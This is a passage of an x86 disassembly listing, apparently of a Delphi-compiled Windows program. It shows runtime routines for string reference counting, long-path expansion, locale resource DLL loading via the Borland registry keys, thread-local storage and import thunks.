retn 4
sub_4000599C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005B28 proc near ; CODE XREF: sub_40007E2C+20�p
; sub_40007E2C+57�p ...
var_4 = dword ptr -4
push esp
add [esp+4+var_4], 4
call sub_4000599C
retn
sub_40005B28 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005B34 proc near ; CODE XREF: sub_40005314+D0�p
; sub_40005994�p ...
mov ecx, [eax]
test ecx, ecx
jz short locret_40005B6D
mov dword ptr [eax], 0
lock dec dword ptr [ecx-8]
jnz short locret_40005B6D
push eax
mov eax, ecx
xor ecx, ecx
mov cl, [edx+1]
mov edx, [ecx+edx+6]
test edx, edx
jz short loc_40005B64
mov ecx, [eax-4]
test ecx, ecx
jz short loc_40005B64
mov edx, [edx]
call sub_40005314
loc_40005B64: ; CODE XREF: sub_40005B34+20�j
; sub_40005B34+27�j
sub eax, 8
call sub_40002C3C
pop eax
locret_40005B6D: ; CODE XREF: sub_40005B34+4�j
; sub_40005B34+10�j
retn
sub_40005B34 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40005B70 proc near ; CODE XREF: sub_40005424+EF�p
; sub_40005540+DD�p
push ebx
mov ebx, [eax]
test edx, edx
jz short loc_40005B7B
lock inc dword ptr [edx-8]
loc_40005B7B: ; CODE XREF: sub_40005B70+5�j
test ebx, ebx
jz short loc_40005B93
lock dec dword ptr [ebx-8]
jnz short loc_40005B93
push eax
push edx
mov edx, ecx
inc dword ptr [ebx-8]
call sub_40005B34
pop edx
pop eax
loc_40005B93: ; CODE XREF: sub_40005B70+D�j
; sub_40005B70+13�j
mov [eax], edx
pop ebx
retn
sub_40005B70 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005B98 proc near ; CODE XREF: sub_40013308+C�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
add esp, 0FFFFFFE4h
push 1Ch
lea edx, [esp+20h+var_1C]
push edx
push eax
call sub_40001258 ; VirtualQuery
cmp [esp+1Ch+var_C], 1000h
jnz short loc_40005BB8
mov eax, [esp+1Ch+var_18]
jmp short loc_40005BBA
; ---------------------------------------------------------------------------
loc_40005BB8: ; CODE XREF: sub_40005B98+18�j
xor eax, eax
loc_40005BBA: ; CODE XREF: sub_40005B98+1E�j
add esp, 1Ch
retn
sub_40005B98 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40005BC0 proc near ; CODE XREF: sub_40005C08+20�p
var_110 = byte ptr -110h
push ebx
push esi
add esp, 0FFFFFEF8h
mov ebx, eax
cmp dword ptr [ebx+10h], 0
jnz short loc_40005BFB
push 105h
lea eax, [esp+114h+var_110]
push eax
mov eax, [ebx+4]
push eax
call sub_400011E8 ; GetModuleFileNameA
mov eax, esp
mov dl, 1
call sub_40005E24
mov esi, eax
mov [ebx+10h], esi
test esi, esi
jnz short loc_40005BFB
mov eax, [ebx+4]
mov [ebx+10h], eax
loc_40005BFB: ; CODE XREF: sub_40005BC0+E�j
; sub_40005BC0+33�j
mov eax, [ebx+10h]
add esp, 108h
pop esi
pop ebx
retn
sub_40005BC0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005C08 proc near ; CODE XREF: sub_400062F0+2C�p
; sub_4000ADE0+EC�p ...
push ebx
push esi
push edi
mov esi, eax
mov ebx, off_4001A038
test ebx, ebx
jz short loc_40005C37
loc_40005C17: ; CODE XREF: sub_40005C08+2D�j
cmp esi, [ebx+4]
jz short loc_40005C26
cmp esi, [ebx+8]
jz short loc_40005C26
cmp esi, [ebx+0Ch]
jnz short loc_40005C31
loc_40005C26: ; CODE XREF: sub_40005C08+12�j
; sub_40005C08+17�j
mov eax, ebx
call sub_40005BC0
mov edi, eax
jmp short loc_40005C39
; ---------------------------------------------------------------------------
loc_40005C31: ; CODE XREF: sub_40005C08+1C�j
mov ebx, [ebx]
test ebx, ebx
jnz short loc_40005C17
loc_40005C37: ; CODE XREF: sub_40005C08+D�j
mov edi, esi
loc_40005C39: ; CODE XREF: sub_40005C08+27�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_40005C08 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40005C40 proc near ; CODE XREF: sub_40005C60+89�p
; sub_40005C60+9C�p ...
push ebx
push esi
mov esi, eax
jmp short loc_40005C4E
; ---------------------------------------------------------------------------
loc_40005C46: ; CODE XREF: sub_40005C40+18�j
push esi
call sub_400011A0 ; CharNextA
mov esi, eax
loc_40005C4E: ; CODE XREF: sub_40005C40+4�j
movzx ebx, byte ptr [esi]
test bl, bl
jz short loc_40005C5A
cmp bl, 5Ch
jnz short loc_40005C46
loc_40005C5A: ; CODE XREF: sub_40005C40+13�j
mov eax, esi
pop esi
pop ebx
retn
sub_40005C40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40005C60 proc near ; CODE XREF: sub_40005E24+A3�p
var_253 = byte ptr -253h
var_14E = byte ptr -14Eh
var_122 = byte ptr -122h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFDACh
push ebx
push esi
push edi
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
push offset dword_40005E00
call sub_400011F0 ; GetModuleHandleA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_40005CCE
push offset aGetlongpathnam ; "GetLongPathNameA"
mov eax, [ebp+var_10]
push eax
call sub_400011F8 ; GetProcAddress
mov ebx, eax
test ebx, ebx
jz short loc_40005CCE
push 105h
lea eax, [ebp+var_253]
push eax
mov eax, [ebp+var_4]
push eax
call ebx
test eax, eax
jz short loc_40005CCE
mov eax, [ebp+var_8]
push eax
lea eax, [ebp+var_253]
push eax
mov eax, [ebp+var_4]
push eax
call sub_40001220 ; lstrcpynA
jmp loc_40005DF6
; ---------------------------------------------------------------------------
loc_40005CCE: ; CODE XREF: sub_40005C60+29�j
; sub_40005C60+3D�j ...
mov eax, [ebp+var_4]
cmp byte ptr [eax], 5Ch
jnz short loc_40005D0E
mov eax, [ebp+var_4]
cmp byte ptr [eax+1], 5Ch
jnz loc_40005DF6
mov eax, [ebp+var_4]
add eax, 2
call sub_40005C40
mov esi, eax
cmp byte ptr [esi], 0
jz loc_40005DF6
lea eax, [esi+1]
call sub_40005C40
mov esi, eax
cmp byte ptr [esi], 0
jz loc_40005DF6
jmp short loc_40005D14
; ---------------------------------------------------------------------------
loc_40005D0E: ; CODE XREF: sub_40005C60+74�j
mov esi, [ebp+var_4]
add esi, 2
loc_40005D14: ; CODE XREF: sub_40005C60+AC�j
mov ebx, esi
sub ebx, [ebp+var_4]
lea eax, [ebx+1]
push eax
mov eax, [ebp+var_4]
push eax
lea eax, [ebp+var_253]
push eax
call sub_40001220 ; lstrcpynA
jmp loc_40005DD9
; ---------------------------------------------------------------------------
loc_40005D32: ; CODE XREF: sub_40005C60+17C�j
lea eax, [esi+1]
call sub_40005C40
mov edi, eax
mov eax, edi
sub eax, esi
add eax, ebx
inc eax
cmp eax, 105h
jg loc_40005DF6
mov eax, edi
sub eax, esi
inc eax
push eax
push esi
lea eax, [ebp+var_253]
add eax, ebx
push eax
call sub_40001220 ; lstrcpynA
lea eax, [ebp+var_14E]
push eax
lea eax, [ebp+var_253]
push eax
call sub_400011C0 ; FindFirstFileA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0FFFFFFFFh
jz short loc_40005DF6
mov eax, [ebp+var_10]
push eax
call sub_400011B8 ; FindClose
lea eax, [ebp+var_122]
push eax
call sub_40001228 ; lstrlenA
lea edx, [ebx+1]
add eax, edx
inc eax
cmp eax, 105h
jg short loc_40005DF6
mov [ebp+ebx+var_253], 5Ch
mov eax, 105h
sub eax, ebx
dec eax
push eax
lea eax, [ebp+var_122]
push eax
lea eax, [ebp+var_253]
add eax, ebx
inc eax
push eax
call sub_40001220 ; lstrcpynA
lea eax, [ebp+var_122]
push eax
call sub_40001228 ; lstrlenA
inc eax
add ebx, eax
mov esi, edi
loc_40005DD9: ; CODE XREF: sub_40005C60+CD�j
cmp byte ptr [esi], 0
jnz loc_40005D32
mov eax, [ebp+var_8]
push eax
lea eax, [ebp+var_253]
push eax
mov eax, [ebp+var_4]
push eax
call sub_40001220 ; lstrcpynA
loc_40005DF6: ; CODE XREF: sub_40005C60+69�j
; sub_40005C60+7D�j ...
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40005C60 endp
; ---------------------------------------------------------------------------
dword_40005E00 dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0aGetlongpathnam db 'GetLongPathNameA',0 ; DATA XREF: sub_40005C60+2B�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40005E24 proc near ; CODE XREF: sub_40005BC0+27�p
var_11D = byte ptr -11Dh
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_B = byte ptr -0Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEE0h
push ebx
push esi
mov [ebp+var_4], eax
push 105h
lea eax, [ebp+var_11D]
push eax
push 0
call sub_400011E8 ; GetModuleFileNameA
mov [ebp+var_12], 0
lea eax, [ebp+var_8]
push eax
push 0F0019h
push 0
push offset aSoftwareBorl_0 ; "Software\\Borland\\Locales"
push 80000001h
call sub_40001240 ; RegOpenKeyExA
test eax, eax
jz short loc_40005EA7
lea eax, [ebp+var_8]
push eax
push 0F0019h
push 0
push offset aSoftwareBorl_0 ; "Software\\Borland\\Locales"
push 80000002h
call sub_40001240 ; RegOpenKeyExA
test eax, eax
jz short loc_40005EA7
lea eax, [ebp+var_8]
push eax
push 0F0019h
push 0
push offset aSoftwareBorl_1 ; "Software\\Borland\\Delphi\\Locales"
push 80000001h
call sub_40001240 ; RegOpenKeyExA
test eax, eax
jnz loc_40005F30
loc_40005EA7: ; CODE XREF: sub_40005E24+41�j
; sub_40005E24+5F�j
xor eax, eax
push ebp
push offset loc_40005F29
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_18], 5
lea eax, [ebp+var_11D]
mov edx, 105h
call sub_40005C60
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_12]
push eax
push 0
push 0
lea eax, [ebp+var_11D]
push eax
mov eax, [ebp+var_8]
push eax
call sub_40001248 ; RegQueryValueExA
test eax, eax
jz short loc_40005F0E
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_12]
push eax
push 0
push 0
push offset dword_40006090
mov eax, [ebp+var_8]
push eax
call sub_40001248 ; RegQueryValueExA
test eax, eax
jz short loc_40005F0E
mov [ebp+var_12], 0
loc_40005F0E: ; CODE XREF: sub_40005E24+C6�j
; sub_40005E24+E4�j
mov [ebp+var_E], 0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40005F30
loc_40005F1F: ; CODE XREF: sub_40005E24+10A�j
mov eax, [ebp+var_8]
push eax
call sub_40001238 ; RegCloseKey
retn
; ---------------------------------------------------------------------------
loc_40005F29: ; DATA XREF: sub_40005E24+86�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40005F1F
; ---------------------------------------------------------------------------
loc_40005F30: ; CODE XREF: sub_40005E24+7D�j
; DATA XREF: sub_40005E24+F6�o
push 105h
mov eax, [ebp+var_4]
push eax
lea eax, [ebp+var_11D]
push eax
call sub_40001220 ; lstrcpynA
push 5
lea eax, [ebp+var_D]
push eax
push 3
call sub_40001208 ; GetThreadLocale
push eax
call sub_400011E0 ; GetLocaleInfoA
xor esi, esi
cmp [ebp+var_11D], 0
jz loc_4000604A
cmp [ebp+var_D], 0
jnz short loc_40005F77
cmp [ebp+var_12], 0
jz loc_4000604A
loc_40005F77: ; CODE XREF: sub_40005E24+147�j
lea eax, [ebp+var_11D]
push eax
call sub_40001228 ; lstrlenA
mov ebx, eax
lea eax, [ebp+var_11D]
add ebx, eax
jmp short loc_40005F90
; ---------------------------------------------------------------------------
loc_40005F8F: ; CODE XREF: sub_40005E24+179�j
dec ebx
loc_40005F90: ; CODE XREF: sub_40005E24+169�j
cmp byte ptr [ebx], 2Eh
jz short loc_40005F9F
lea eax, [ebp+var_11D]
cmp ebx, eax
jnz short loc_40005F8F
loc_40005F9F: ; CODE XREF: sub_40005E24+16F�j
lea eax, [ebp+var_11D]
cmp ebx, eax
jz loc_4000604A
inc ebx
cmp [ebp+var_12], 0
jz short loc_40005FDC
mov edx, ebx
sub edx, eax
mov eax, 105h
sub eax, edx
push eax
lea eax, [ebp+var_12]
push eax
push ebx
call sub_40001220 ; lstrcpynA
push 2
push 0
lea eax, [ebp+var_11D]
push eax
call sub_40001210 ; LoadLibraryExA
mov esi, eax
loc_40005FDC: ; CODE XREF: sub_40005E24+18E�j
test esi, esi
jnz short loc_4000604A
cmp [ebp+var_D], 0
jz short loc_4000604A
lea eax, [ebp+var_11D]
mov edx, ebx
sub edx, eax
mov eax, 105h
sub eax, edx
push eax
lea eax, [ebp+var_D]
push eax
push ebx
call sub_40001220 ; lstrcpynA
push 2
push 0
lea eax, [ebp+var_11D]
push eax
call sub_40001210 ; LoadLibraryExA
mov esi, eax
test esi, esi
jnz short loc_4000604A
mov [ebp+var_B], 0
lea eax, [ebp+var_11D]
mov edx, ebx
sub edx, eax
mov eax, 105h
sub eax, edx
push eax
lea eax, [ebp+var_D]
push eax
push ebx
call sub_40001220 ; lstrcpynA
push 2
push 0
lea eax, [ebp+var_11D]
push eax
call sub_40001210 ; LoadLibraryExA
mov esi, eax
loc_4000604A: ; CODE XREF: sub_40005E24+13D�j
; sub_40005E24+14D�j ...
mov eax, esi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40005E24 endp
; ---------------------------------------------------------------------------
align 4
aSoftwareBorl_0 db 'Software\Borland\Locales',0 ; DATA XREF: sub_40005E24+30�o
; sub_40005E24+4E�o
align 10h
aSoftwareBorl_1 db 'Software\Borland\Delphi\Locales',0 ; DATA XREF: sub_40005E24+6C�o
dword_40006090 dd 0
; =============== S U B R O U T I N E =======================================
sub_40006094 proc near ; CODE XREF: sub_400191F8+24�p
call sub_400060A4
retn
sub_40006094 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000609C proc near ; CODE XREF: sub_40013ED4+6E�p
call sub_400060C4
retn
sub_4000609C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400060A4 proc near ; CODE XREF: sub_40006094�p
; sub_400190AC+50�p
push ebx
mov ebx, eax
mov eax, 8
call sub_40002C20
mov edx, dword_4001A03C
mov [eax], edx
mov [eax+4], ebx
mov dword_4001A03C, eax
pop ebx
retn
sub_400060A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400060C4 proc near ; CODE XREF: sub_4000609C�p
; sub_4000CC50+2C�p
push ebx
push esi
push edi
push ebp
mov ebp, eax
mov edi, dword_4001A03C
test edi, edi
jz short loc_400060F5
mov eax, [edi+4]
cmp eax, ebp
jnz short loc_400060F5
mov eax, dword_4001A03C
mov eax, [eax]
mov dword_4001A03C, eax
mov edx, 8
mov eax, edi
call sub_40002C3C
jmp short loc_40006122
; ---------------------------------------------------------------------------
loc_400060F5: ; CODE XREF: sub_400060C4+E�j
; sub_400060C4+15�j
mov ebx, edi
test ebx, ebx
jz short loc_40006122
loc_400060FB: ; CODE XREF: sub_400060C4+5C�j
mov esi, [ebx]
test esi, esi
jz short loc_4000611C
mov eax, [esi+4]
cmp eax, ebp
jnz short loc_4000611C
mov edi, esi
mov eax, [esi]
mov [ebx], eax
mov edx, 8
mov eax, edi
call sub_40002C3C
jmp short loc_40006122
; ---------------------------------------------------------------------------
loc_4000611C: ; CODE XREF: sub_400060C4+3B�j
; sub_400060C4+42�j
mov ebx, [ebx]
test ebx, ebx
jnz short loc_400060FB
loc_40006122: ; CODE XREF: sub_400060C4+2F�j
; sub_400060C4+35�j ...
pop ebp
pop edi
pop esi
pop ebx
retn
sub_400060C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40006128 proc near ; CODE XREF: sub_40006194+1B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, dword_4001A03C
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4000617B
loc_40006142: ; CODE XREF: sub_40006128+51�j
xor eax, eax
push ebp
push offset loc_40006163
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [ebp+var_8]
mov eax, [ebp+var_4]
call dword ptr [ebx+4]
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4000616D
; ---------------------------------------------------------------------------
loc_40006163: ; DATA XREF: sub_40006128+1D�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
call sub_40004360
loc_4000616D: ; CODE XREF: sub_40006128+39�j
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40006142
loc_4000617B: ; CODE XREF: sub_40006128+18�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_40006128 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40006184 proc near ; CODE XREF: sub_40006468+5�p
mov edx, off_4001A038
mov [eax], edx
mov off_4001A038, eax
retn
sub_40006184 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40006194 proc near ; CODE XREF: sub_40004790+73�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], eax
xor edx, edx
push ebp
push offset loc_400061F8
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
mov eax, [eax+4]
call sub_40006128
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400061FF
loc_400061C1: ; CODE XREF: sub_40006194+69�j
mov eax, [ebp+var_4]
cmp eax, off_4001A038
jnz short loc_400061D8
mov eax, [ebp+var_4]
mov eax, [eax]
mov off_4001A038, eax
jmp short loc_400061F7
; ---------------------------------------------------------------------------
loc_400061D8: ; CODE XREF: sub_40006194+36�j
mov eax, off_4001A038
test eax, eax
jz short loc_400061F7
loc_400061E1: ; CODE XREF: sub_40006194+61�j
mov edx, [eax]
cmp edx, [ebp+var_4]
jnz short loc_400061F1
mov edx, [ebp+var_4]
mov edx, [edx]
mov [eax], edx
jmp short loc_400061F7
; ---------------------------------------------------------------------------
loc_400061F1: ; CODE XREF: sub_40006194+52�j
mov eax, [eax]
test eax, eax
jnz short loc_400061E1
loc_400061F7: ; CODE XREF: sub_40006194+42�j
; sub_40006194+4B�j ...
retn
; ---------------------------------------------------------------------------
loc_400061F8: ; DATA XREF: sub_40006194+A�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400061C1
; ---------------------------------------------------------------------------
loc_400061FF: ; CODE XREF: sub_40006194:loc_400061F7�j
; DATA XREF: sub_40006194+28�o
pop ecx
pop ebp
retn
sub_40006194 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40006204 proc near ; CODE XREF: sub_40003D9C+7E�p
; sub_40005314+BF�p ...
mov edx, [eax]
test edx, edx
jz short locret_40006218
mov dword ptr [eax], 0
push eax
push edx
mov eax, [edx]
call dword ptr [eax+8]
pop eax
locret_40006218: ; CODE XREF: sub_40006204+4�j
retn
sub_40006204 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000621C proc near ; CODE XREF: sub_40003D6C+27�j
; sub_40003D9C+63�p ...
test edx, edx
jz short loc_40006239
push edx
push eax
mov eax, [edx]
push edx
call dword ptr [eax+4]
pop eax
mov ecx, [eax]
pop dword ptr [eax]
test ecx, ecx
jnz short loc_40006232
retn
; ---------------------------------------------------------------------------
loc_40006232: ; CODE XREF: sub_4000621C+13�j
mov eax, [ecx]
push ecx
call dword ptr [eax+8]
retn
; ---------------------------------------------------------------------------
loc_40006239: ; CODE XREF: sub_4000621C+2�j
mov ecx, [eax]
test ecx, ecx
mov [eax], edx
jz short locret_40006247
mov eax, [ecx]
push ecx
call dword ptr [eax+8]
locret_40006247: ; CODE XREF: sub_4000621C+23�j
retn
sub_4000621C endp
; =============== S U B R O U T I N E =======================================
sub_40006248 proc near ; DATA XREF: .text:40001110�o
; .text:40007938�o
add eax, 4
push eax
call sub_40001280 ; InterlockedDecrement
retn
sub_40006248 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40006254 proc near ; DATA XREF: .text:40001114�o
; .text:4000793C�o
cmp dword ptr [eax+4], 0
jz short locret_40006261
mov al, 2
call sub_40002D50
; ---------------------------------------------------------------------------
locret_40006261: ; CODE XREF: sub_40006254+4�j
retn
sub_40006254 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40006264 proc near ; DATA XREF: .text:40001120�o
; .text:40007948�o
call sub_40003C80
mov dword ptr [eax+4], 1
retn
sub_40006264 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+8]
mov ecx, [ebp+10h]
mov edx, [ebp+0Ch]
mov eax, ebx
call sub_40003D9C
test al, al
jz short loc_40006290
xor eax, eax
jmp short loc_40006295
; ---------------------------------------------------------------------------
loc_40006290: ; CODE XREF: .text:4000628A�j
mov eax, 80004002h
loc_40006295: ; CODE XREF: .text:4000628E�j
pop ebx
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
mov eax, [ebp+8]
add eax, 4
push eax
call sub_40001278 ; InterlockedIncrement
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ebx
push esi
mov ebx, [ebp+8]
lea eax, [ebx+4]
push eax
call sub_40001280 ; InterlockedDecrement
mov esi, eax
test esi, esi
jnz short loc_400062D0
mov dl, 1
mov eax, ebx
mov ecx, [eax]
call dword ptr [ecx-4]
loc_400062D0: ; CODE XREF: .text:400062C5�j
mov eax, esi
pop esi
pop ebx
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400062D8 proc near ; CODE XREF: sub_40017A1C+31A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_400062E6
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_400062E6: ; CODE XREF: sub_400062D8+8�j
call off_4001A728
pop ebp
retn
sub_400062D8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400062F0 proc near ; CODE XREF: sub_40004624+16�p
; sub_4000A8E0+2E�p ...
var_1008 = byte ptr -1008h
push ebx
push esi
add esp, 0FFFFF004h
push eax
mov esi, edx
mov ebx, eax
test ebx, ebx
jz short loc_4000633E
cmp dword ptr [ebx+4], 10000h
jge short loc_40006334
push 1000h
lea eax, [esp+100Ch+var_1008]
push eax
mov eax, [ebx+4]
push eax
mov eax, [ebx]
mov eax, [eax]
call sub_40005C08
push eax
call sub_40001218 ; LoadStringA
mov ecx, eax
mov edx, esp
mov eax, esi
call sub_40004974
jmp short loc_4000633E
; ---------------------------------------------------------------------------
loc_40006334: ; CODE XREF: sub_400062F0+18�j
mov eax, esi
mov edx, [ebx+4]
call sub_40004A7C
loc_4000633E: ; CODE XREF: sub_400062F0+F�j
; sub_400062F0+42�j
add esp, 1000h
pop esi
pop ebx
retn
sub_400062F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006348 proc near ; CODE XREF: .itext:40019080�p
jmp ds:dword_40024414
sub_40006348 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40006350 proc near ; DATA XREF: .text:40018320�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_400063A4
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001C5B8
jnz short loc_40006396
mov eax, offset dword_4001C050
call sub_4000349C
mov eax, offset dword_4001C21C
call sub_4000349C
mov eax, offset dword_4001C3E8
call sub_4000349C
call sub_40002BB4
mov eax, offset off_4001A040
call sub_40004884
loc_40006396: ; CODE XREF: sub_40006350+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400063AB
loc_400063A3: ; CODE XREF: sub_40006350+59�j
retn
; ---------------------------------------------------------------------------
loc_400063A4: ; DATA XREF: sub_40006350+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400063A3
; ---------------------------------------------------------------------------
loc_400063AB: ; CODE XREF: sub_40006350:loc_400063A3�j
; DATA XREF: sub_40006350+4E�o
pop ebp
retn
sub_40006350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400063B0 proc near ; CODE XREF: sub_40006474+C�p
jmp ds:dword_400244C0
sub_400063B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400063B8 proc near ; CODE XREF: sub_400063D0+3�p
jmp ds:dword_400244BC
sub_400063B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400063C0 proc near ; CODE XREF: sub_40006428+25�p
; sub_40006428+36�p
jmp ds:dword_400244B8
sub_400063C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400063C8 proc near ; CODE XREF: sub_400063E4+3D�p
jmp ds:dword_400244B4
sub_400063C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400063D0 proc near ; CODE XREF: sub_400063E4+21�p
push eax
push 40h
call sub_400063B8 ; LocalAlloc
retn
sub_400063D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400063DC proc near ; CODE XREF: sub_400063E4+1�p
mov eax, 0Ch
retn
sub_400063DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400063E4 proc near ; CODE XREF: sub_40006428:loc_40006442�p
push ebx
call sub_400063DC
mov ebx, eax
test ebx, ebx
jz short loc_40006426
cmp TlsIndex, 0FFFFFFFFh
jnz short loc_40006403
mov eax, 0E2h
call sub_40004878
; ---------------------------------------------------------------------------
loc_40006403: ; CODE XREF: sub_400063E4+13�j
mov eax, ebx
call sub_400063D0
test eax, eax
jnz short loc_4000641A
mov eax, 0E2h
call sub_40004878
; ---------------------------------------------------------------------------
jmp short loc_40006426
; ---------------------------------------------------------------------------
loc_4000641A: ; CODE XREF: sub_400063E4+28�j
push eax
mov eax, TlsIndex
push eax
call sub_400063C8 ; TlsSetValue
loc_40006426: ; CODE XREF: sub_400063E4+A�j
; sub_400063E4+34�j
pop ebx
retn
sub_400063E4 endp
; =============== S U B R O U T I N E =======================================
sub_40006428 proc near ; CODE XREF: sub_40002CA4�p
; sub_40002CA4+E�p ...
mov cl, ds:byte_4001E7F4
mov eax, TlsIndex
test cl, cl
jnz short loc_4000645D
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_40006442: ; CODE XREF: sub_40006428+3D�j
call sub_400063E4
mov eax, TlsIndex
push eax
call sub_400063C0 ; TlsGetValue
test eax, eax
jz short loc_40006457
retn
; ---------------------------------------------------------------------------
loc_40006457: ; CODE XREF: sub_40006428+2C�j
mov eax, ds:dword_4001E7FC
retn
; ---------------------------------------------------------------------------
loc_4000645D: ; CODE XREF: sub_40006428+D�j
push eax
call sub_400063C0 ; TlsGetValue
test eax, eax
jz short loc_40006442
retn
sub_40006428 endp
; =============== S U B R O U T I N E =======================================
sub_40006468 proc near ; CODE XREF: sub_40006474+2E�p
mov eax, offset dword_4001A7B4
call sub_40006184
retn
sub_40006468 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40006474 proc near ; CODE XREF: .itext:40019408�p
push ebx
mov ebx, eax
xor eax, eax
mov TlsIndex, eax
push 0
call sub_400063B0 ; GetModuleHandleA
mov ds:dword_4001E7F8, eax
mov eax, ds:dword_4001E7F8
mov dword_4001A7B8, eax
xor eax, eax
mov dword_4001A7BC, eax
xor eax, eax
mov dword_4001A7C0, eax
call sub_40006468
mov edx, offset dword_4001A7B4
mov eax, ebx
call sub_400045E4
pop ebx
retn
sub_40006474 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400064B8 proc near ; CODE XREF: sub_40017944+35�p
jmp ds:dword_4002461C
sub_400064B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400064C0 proc near ; CODE XREF: sub_400141BC+1A�p
; sub_400141EC+14�p
jmp ds:dword_40024618
sub_400064C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
